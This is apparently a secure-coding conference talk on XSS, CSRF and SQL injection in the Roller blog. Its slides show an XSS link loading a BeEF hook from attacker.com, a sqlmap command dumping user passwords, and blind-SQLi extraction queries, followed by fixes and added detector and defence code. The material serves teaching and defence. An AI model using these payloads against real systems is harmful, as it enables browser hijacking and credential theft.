Java EE Web Security By Example: Frank Kim

Learn how to exploit security vulnerabilities that are commonly found in the arsenal of malicious attackers. We won't simply talk about issues like XSS, CSRF and SQL Injection, but will have live demos showing how hackers exploit these potentially devastating defects using freely available tools. You'll see how to hack a real world open source application and explore bugs in commonly used open source frameworks. We also look at the source code and see how to fix these issues using secure coding principles. We will also discuss best practices that can be used to build security into your SDLC. Java developers and architects will learn how to find and fix security issues in their applications before hackers do.

  1. Java EE Web Security By Example, JAX 2012
  2. About
     - Frank Kim: Consultant, ThinkSec; Author, SANS Secure Coding in Java/JEE; SANS Application Security Curriculum Lead
  3. What You Should Know
     - Hacking is not hard
     - Don't trust any data: assume that your users are evil!
  4. Outline
     - Web App Attack Refresher: XSS, CSRF, SQL Injection
     - Testing: hacking an open source app
     - Secure Coding: fixing security bugs
  5. Cross-Site Scripting (XSS)
     - Occurs when unvalidated data is displayed back to the browser
     - Types of XSS: stored, reflected, Document Object Model (DOM) based
  6. Cross-Site Request Forgery (CSRF)
  7. SQL Injection (SQLi)
     - Occurs when dynamic SQL queries are used: by injecting arbitrary SQL commands, attackers can extend the meaning of the original query and can potentially execute any SQL statement on the database
     - Very powerful: #1 on the CWE/SANS Top 25 Most Dangerous Software Errors, #1 on the OWASP Top 10
  8. Outline (repeated before the Testing section)
  9. What are We Testing?
     - Installation of Roller 3.0
     - Fake install of the SANS AppSec Street Fighter Blog
     - Want to simulate the actions that a real attacker might take; there are definitely other avenues of attack, we're walking through one attack scenario
  10. Attack Scenario
      1) XSS to control the victim's browser
      2) Combine XSS and CSRF to conduct a privilege escalation attack; use the escalated privileges to access another feature
      3) Use SQL Injection to access the database directly
  11. Spot the Vuln: XSS
  12. XSS in head.jsp
  13. Testing the "look" Param
      - Admin pages include head.jsp
      - The param is persistent for the session
  14. XSS Exploitation
      - Introducing BeEF, the Browser Exploitation Framework: http://www.bindshell.net/tools/beef
      - Uses XSS to hook the victim's browser: log user keystrokes, view browsing history, execute JavaScript, etc.; advanced attacks include Metasploit integration, browser exploits, etc.
  15. XSS Exploitation Overview
      1) Attacker sends a link carrying the evil BeEF script: `http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>`
      2) Victim clicks the evil link
      3) Victim's browser sends data to the attacker
  16. BeEF XSS Demo
  17. Spot the Vuln: CSRF
  18. CSRF in UserAdmin.jsp: we want to use CSRF to change this field
  19. CSRF Demo
  20. Spot the Vuln: SQL Injection
  21. SQL Injection in UserServlet
  22. SQL Injection Testing
      - UserServlet is vulnerable to SQLi: `http://localhost:8080/roller/roller-ui/authoring/user` (the test request returns "No results")
  23. Exploiting SQL Injection
      - Introducing sqlmap: http://sqlmap.sourceforge.net
      - Tool that automates detection and exploitation of SQL Injection vulns: supports MySQL, Oracle, PostgreSQL and MS SQL Server; supports blind, inband and batch queries; fingerprinting/enumeration (dump db schemas, table/column names, data, db users, etc.); takeover features (read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc.)
  24. sqlmap Syntax
      - Dump userids and passwords:

        ```sh
        python sqlmap.py -u "http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25" --cookie "username=test; JSESSIONID=<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2
        ```
  25. SQL Injection Demo
  26. How it Works: the values sqlmap sends in the `startsWith` parameter, differing only in the compared number

      ```sql
      f% AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND neEy LIKE neEy
      f% AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND neEy LIKE neEy
      f% AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND neEy LIKE neEy
      ```
  27. Step By Step [0]

      ```sql
      SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;
      -- returns ilovethetajmahal
      ```
  28. Step By Step [1]

      ```sql
      SELECT MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);
      -- returns i
      SELECT MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);
      -- returns l
      SELECT MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);
      -- returns o
      ```
  29. Step By Step [2]

      ```sql
      SELECT ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));
      -- returns 105
      SELECT ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));
      -- returns 108
      SELECT ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));
      -- returns 111
      ```
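The probes on slides 26 to 29 leave a distinctive trace in the web server's access log: a burst of requests to the same URL whose query differs only in the compared number. The following detector is an added example, not code from the talk or from Roller; it assumes a combined-format access log and uses constructed log lines that mimic those probes (`BlindSqliDetector` and its method names are hypothetical). It flags a line on two signals: SQL tokens in the percent-decoded query string, and groups of requests whose query is identical once digit runs are masked.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not from the talk): detection logic for the request pattern shown on
 * the "How it Works" slides. Boolean-based blind extraction sends many requests that
 * differ only in a compared number (> 103, > 104, > 105 ...). Two signals are checked:
 *  (1) SQL tokens in the decoded query string of a single line;
 *  (2) bursts of requests whose query is identical once digits are masked.
 * Log format, IPs and names below are constructed for the example.
 */
public final class BlindSqliDetector {
    // Function calls and clauses typical of extraction payloads (case-insensitive).
    private static final Pattern SQL_TOKENS = Pattern.compile(
        "(?i)\\b(ORD|MID|SUBSTR(ING)?|ASCII|IFNULL|SLEEP|BENCHMARK)\\s*\\("
        + "|\\bLIMIT\\s+\\d+\\s*,\\s*\\d+"
        + "|\\bAND\\b\\s+\\S+\\s+LIKE\\b");
    // Request target of a combined-format line: "GET /path?query HTTP/1.1"
    private static final Pattern REQUEST_LINE = Pattern.compile("\"GET (\\S+) HTTP");

    /** Extracts and percent-decodes the query string from a log line, or null if none. */
    public static String decodedQuery(String logLine) {
        Matcher m = REQUEST_LINE.matcher(logLine);
        if (!m.find()) return null;
        String target = m.group(1);
        int q = target.indexOf('?');
        if (q < 0) return null;
        return URLDecoder.decode(target.substring(q + 1), StandardCharsets.UTF_8);
    }

    /** Signal 1: does the decoded query contain SQL tokens that a theme/search value never needs? */
    public static boolean hasSqlTokens(String query) {
        return query != null && SQL_TOKENS.matcher(query).find();
    }

    /** Masks digit runs so "... > 103 ..." and "... > 104 ..." fold to the same key. */
    public static String maskNumbers(String query) {
        return query.replaceAll("\\d+", "N");
    }

    /** Signal 2: masked queries seen at least `burst` times, i.e. likely character-extraction loops. */
    public static Set<String> burstQueries(List<String> logLines, int burst) {
        Map<String, Integer> counts = new HashMap<>();
        for (String line : logLines) {
            String query = decodedQuery(line);
            if (query == null) continue;
            counts.merge(maskNumbers(query), 1, Integer::sum);
        }
        Set<String> out = new TreeSet<>();
        counts.forEach((key, n) -> { if (n >= burst) out.add(key); });
        return out;
    }

    public static void main(String[] args) {
        // Constructed log lines: one benign search, then three probes encoded as a tool sends them.
        String base = "10.0.0.5 - - [01/Jan/2012:10:00:00 +0000] "
                    + "\"GET /roller/roller-ui/authoring/user?startsWith=";
        List<String> lines = new ArrayList<>();
        lines.add(base + "f%25 HTTP/1.1\" 200 512");
        for (int n = 103; n <= 105; n++) {
            lines.add(base + "f%25%20AND%20ORD(MID((SELECT%20passphrase%20FROM%20roller.rolleruser"
                    + "%20LIMIT%202,1),1,1))%3E" + n + "%20AND%20neEy%20LIKE%20neEy HTTP/1.1\" 200 512");
        }
        for (String line : lines) {
            // false for the benign line, true for each probe
            System.out.println(hasSqlTokens(decodedQuery(line)) + "  " + decodedQuery(line));
        }
        // One masked query seen three times: the extraction loop.
        System.out.println(burstQueries(lines, 3));
    }
}
```

The two signals complement each other: token matching catches a single probe but can be evaded by obfuscation, while the burst count is insensitive to the exact payload and also surfaces the repeated near-identical requests that any per-character extraction produces. In a real deployment the threshold would be tuned per endpoint, and `URLDecoder.decode(String, Charset)` requires Java 10 or later.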
  30. Attack Summary
      1) XSS to control the victim's browser
      2) Combine XSS and CSRF to conduct a privilege escalation attack; use the escalated privileges to access another feature
      3) Use SQL Injection to access the database directly
  31. Outline (repeated before the Secure Coding section)
  32. Data Validation (diagram): inbound data passes through validation ("Should I be consuming this?") before the application uses it, and outbound data passes through encoding ("Should I be emitting this?") before it is emitted; the same validation-in, encoding-out pair sits between the application and its data store
  33. Output Encoding
      - Encoding: convert characters so they are treated as data and not as special characters
      - Must escape differently depending on where the data is displayed on the page
      - XSS Prevention Cheat Sheet: http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
  34. Fix XSS in head.jsp
      - Add URL encoding:

        ```jsp
        <link rel="stylesheet" type="text/css" media="all"
              href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />
        ```
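The fix on slide 34 encodes the theme name for the URL context it lands in. The class below is an added example, not Roller's head.jsp or ESAPI's code, and shows the same idea in plain JDK (Java 10 or later) plus the validation layer slide 32 calls for: a theme name is rejected unless it matches an allowlist, and what survives is percent-encoded for the path segment and then attribute-encoded for the surrounding HTML. `ThemeName`, its methods and the allowlist pattern are hypothetical.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;

/**
 * Added example (not Roller's or the talk's own code): two layers of defence for the
 * "look"/theme parameter from head.jsp.
 *  1. Allowlist validation: a theme name is a simple identifier, so anything else is
 *     replaced by the default before it goes near the page.
 *  2. Output encoding for the exact context (a URL path segment inside an HTML
 *     attribute), so even a value that slipped through could not close the attribute
 *     or start a tag.
 */
public final class ThemeName {
    // Constructed allowlist: letters, digits, dash and underscore, 1 to 40 characters.
    private static final Pattern SAFE_THEME = Pattern.compile("[A-Za-z0-9_-]{1,40}");
    private static final String DEFAULT_THEME = "basic";   // hypothetical default

    /** Returns the submitted theme if it passes the allowlist, otherwise the default. */
    public static String validate(String submitted) {
        if (submitted != null && SAFE_THEME.matcher(submitted).matches()) {
            return submitted;
        }
        return DEFAULT_THEME;
    }

    /**
     * Percent-encodes a value for use as one URL path segment. java.net.URLEncoder is a
     * form (application/x-www-form-urlencoded) encoder, so it turns a space into '+';
     * that is corrected to %20 for a path. The characters that matter for XSS
     * ('"', '<', '>', '/', '\'') are all percent-encoded.
     */
    public static String encodeForUrlPathSegment(String value) {
        return URLEncoder.encode(value, StandardCharsets.UTF_8).replace("+", "%20");
    }

    /** Encodes the five characters that can break out of an HTML attribute or tag. */
    public static String encodeForHtmlAttribute(String value) {
        StringBuilder sb = new StringBuilder(value.length());
        for (char c : value.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#x27;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Builds the stylesheet link the way the fixed head.jsp does, with both layers applied. */
    public static String stylesheetLink(String contextPath, String submittedTheme) {
        String theme = validate(submittedTheme);
        String href = contextPath + "/roller-ui/theme/" + encodeForUrlPathSegment(theme) + "/colors.css";
        return "<link rel=\"stylesheet\" type=\"text/css\" media=\"all\" href=\""
                + encodeForHtmlAttribute(href) + "\" />";
    }

    public static void main(String[] args) {
        // Constructed input: the attribute-breaking prefix of the payload shape on slide 15.
        String hostile = "\"><script>";
        System.out.println(validate(hostile));                 // basic
        System.out.println(encodeForUrlPathSegment(hostile));  // %22%3E%3Cscript%3E
        System.out.println(stylesheetLink("/roller", hostile));
        System.out.println(stylesheetLink("/roller", "dark-blue"));
    }
}
```

Encoding alone, as on the slide, is enough to stop the break-out; the allowlist is the belt to that pair of braces and also keeps nonsense theme names from reaching the file system path. Note that `URLEncoder` is the right tool only because the value is confined to a single path segment; a value placed into a JavaScript block or a CSS property would need the encoder for that context, which is the point of slide 33's second bullet.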
  35. Fix CSRF in Update User Functionality
      - UserAdmin.jsp: add an anti-CSRF token (attribute values quoted)

        ```jsp
        <input type="hidden" name="<%= CSRFTokenUtil.SESSION_ATTR_KEY %>" value="<%= CSRFTokenUtil.getToken(request.getSession(false)) %>">
        ```
      - UserAdminAction.java: check the anti-CSRF token

        ```java
        if (!CSRFTokenUtil.isValid(req.getSession(false), req)) {
            return mapping.findForward("error");
        }
        ```
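Slide 35 calls `CSRFTokenUtil` but does not show its source. The class below is an added example of what such a synchronizer-token utility needs to get right, not the talk's or Roller's `CSRFTokenUtil`: one unguessable token per session from `SecureRandom`, a constant-time comparison, and fail-closed handling of a missing session or parameter. The session is modelled as a `Map<String, Object>` so the example runs stand-alone; in a servlet the same two calls map onto `HttpSession.getAttribute` and `setAttribute`. `SyncToken` and the attribute key are hypothetical names.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

/**
 * Added example (not the CSRFTokenUtil from the talk): a minimal synchronizer-token
 * implementation.
 *  - One token per session, generated from SecureRandom, so a cross-site page cannot guess it.
 *  - Comparison via MessageDigest.isEqual, so response timing does not leak the token.
 *  - Missing session, never-issued token, missing parameter or wrong value all fail closed.
 */
public final class SyncToken {
    public static final String SESSION_ATTR_KEY = "csrf.token";   // hypothetical attribute name
    private static final SecureRandom RNG = new SecureRandom();

    /** Returns the session's token, creating it on first use (called when rendering the form). */
    public static String getToken(Map<String, Object> session) {
        if (session == null) {
            return null;
        }
        Object existing = session.get(SESSION_ATTR_KEY);
        if (existing instanceof String) {
            return (String) existing;
        }
        byte[] raw = new byte[32];                          // 256 bits of entropy
        RNG.nextBytes(raw);
        String token = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
        session.put(SESSION_ATTR_KEY, token);
        return token;
    }

    /**
     * Validates the token submitted with a state-changing request (called by the action).
     * Returns false when there is no session, no token has been issued, the parameter is
     * absent, or the values differ. It deliberately never creates a token here: a check
     * that mints a fresh token and then compares against it would always pass.
     */
    public static boolean isValid(Map<String, Object> session, String submitted) {
        if (session == null || submitted == null) {
            return false;
        }
        Object expected = session.get(SESSION_ATTR_KEY);
        if (!(expected instanceof String)) {
            return false;
        }
        byte[] a = ((String) expected).getBytes(StandardCharsets.UTF_8);
        byte[] b = submitted.getBytes(StandardCharsets.UTF_8);
        return MessageDigest.isEqual(a, b);                 // constant-time for equal lengths
    }

    public static void main(String[] args) {
        Map<String, Object> session = new HashMap<>();
        String token = getToken(session);                   // rendered into the hidden field

        // The legitimate form submit echoes the token back.
        System.out.println(isValid(session, token));            // true
        // A forged cross-site request cannot read the page, so it arrives without the token or with a guess.
        System.out.println(isValid(session, null));             // false
        System.out.println(isValid(session, "guess"));          // false
        // A session that never rendered the form has no token to match.
        System.out.println(isValid(new HashMap<>(), token));    // false
    }
}
```

The check must be reached on every state-changing request of the update-user feature, not only on the form page; the `findForward("error")` branch on the slide is where `isValid` returning false lands. Reading the submitted value from the request is left to the caller so that the comparison logic stays independent of the web framework.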
  36. Fix SQL Injection in UserServlet.java
      - Use parameterized queries correctly:

        ```java
        if (startsWith == null || startsWith.equals("")) {
            query = "SELECT username, emailaddress FROM rolleruser";
            stmt = con.prepareStatement(query);
        } else {
            query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";
            stmt = con.prepareStatement(query);
            stmt.setString(1, startsWith + "%");
            stmt.setString(2, startsWith + "%");
        }
        rs = stmt.executeQuery();
        ```
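The parameterized query on slide 36 removes the injection, but it leaves one caveat: `%` and `_` inside the bound value are still `LIKE` wildcards, so a search for `%` lists every user. The class below is an added example, not Roller's UserServlet, that keeps the slide's binding and adds the wildcard escaping. It compiles against `java.sql` alone; `findUsers` needs a live `Connection` to run, while `prefixPattern` and `main` run without one. `UserSearch` and its method names are hypothetical, and the escape character `!` is a constructed choice.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.ArrayList;
import java.util.List;

/**
 * Added example (not Roller's UserServlet): the parameterized query from the slide plus
 * LIKE-wildcard escaping. Binding startsWith + "%" with setString stops SQL injection
 * because the value is never part of the SQL text; escapeLike() additionally makes '%',
 * '_' and the escape character match literally, and the query declares ESCAPE '!'.
 * '!' is used rather than a backslash because backslash is itself an escape inside
 * MySQL string literals, which makes ESCAPE '\' a portability trap.
 */
public final class UserSearch {
    private static final char ESC = '!';

    /** Escapes LIKE metacharacters so the bound value is matched literally. */
    public static String escapeLike(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            if (c == ESC || c == '%' || c == '_') {
                sb.append(ESC);
            }
            sb.append(c);
        }
        return sb.toString();
    }

    /** Pattern for "begins with startsWith", safe to bind as a parameter. */
    public static String prefixPattern(String startsWith) {
        return escapeLike(startsWith) + "%";
    }

    /** Returns "username <emailaddress>" rows; user input only ever travels through setString. */
    public static List<String> findUsers(Connection con, String startsWith) throws SQLException {
        boolean filtered = startsWith != null && !startsWith.isEmpty();
        String sql = filtered
            ? "SELECT username, emailaddress FROM rolleruser "
              + "WHERE username LIKE ? ESCAPE '!' OR emailaddress LIKE ? ESCAPE '!'"
            : "SELECT username, emailaddress FROM rolleruser";
        List<String> out = new ArrayList<>();
        try (PreparedStatement stmt = con.prepareStatement(sql)) {
            if (filtered) {
                String pattern = prefixPattern(startsWith);
                stmt.setString(1, pattern);
                stmt.setString(2, pattern);
            }
            try (ResultSet rs = stmt.executeQuery()) {
                while (rs.next()) {
                    out.add(rs.getString("username") + " <" + rs.getString("emailaddress") + ">");
                }
            }
        }
        return out;
    }

    public static void main(String[] args) {
        // Constructed inputs: a normal prefix, a wildcard probe, and the shape of the slide-26 probe.
        System.out.println(prefixPattern("f"));                      // f%
        System.out.println(prefixPattern("%"));                      // !%%  (a literal '%' prefix, not "everything")
        System.out.println(prefixPattern("f% AND neEy LIKE neEy"));  // f!% AND neEy LIKE neEy%  (bound as data, never parsed)
    }
}
```

The second and third outputs show the two different problems: the slide's code alone would turn a `%` search into a full table listing (a data-exposure issue, not injection), while the injection probe is harmless in both versions because it reaches the database as a bound string rather than as SQL text.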
  37. Building Secure Software (diagram; source: Microsoft SDL)
  38. Remember
      - Hacking is not hard
      - Don't trust any data: validate input, encode output, use CSRF tokens, use parameterized queries
  39. Thanks! Frank Kim, frank@thinksec.com, @sansappsec
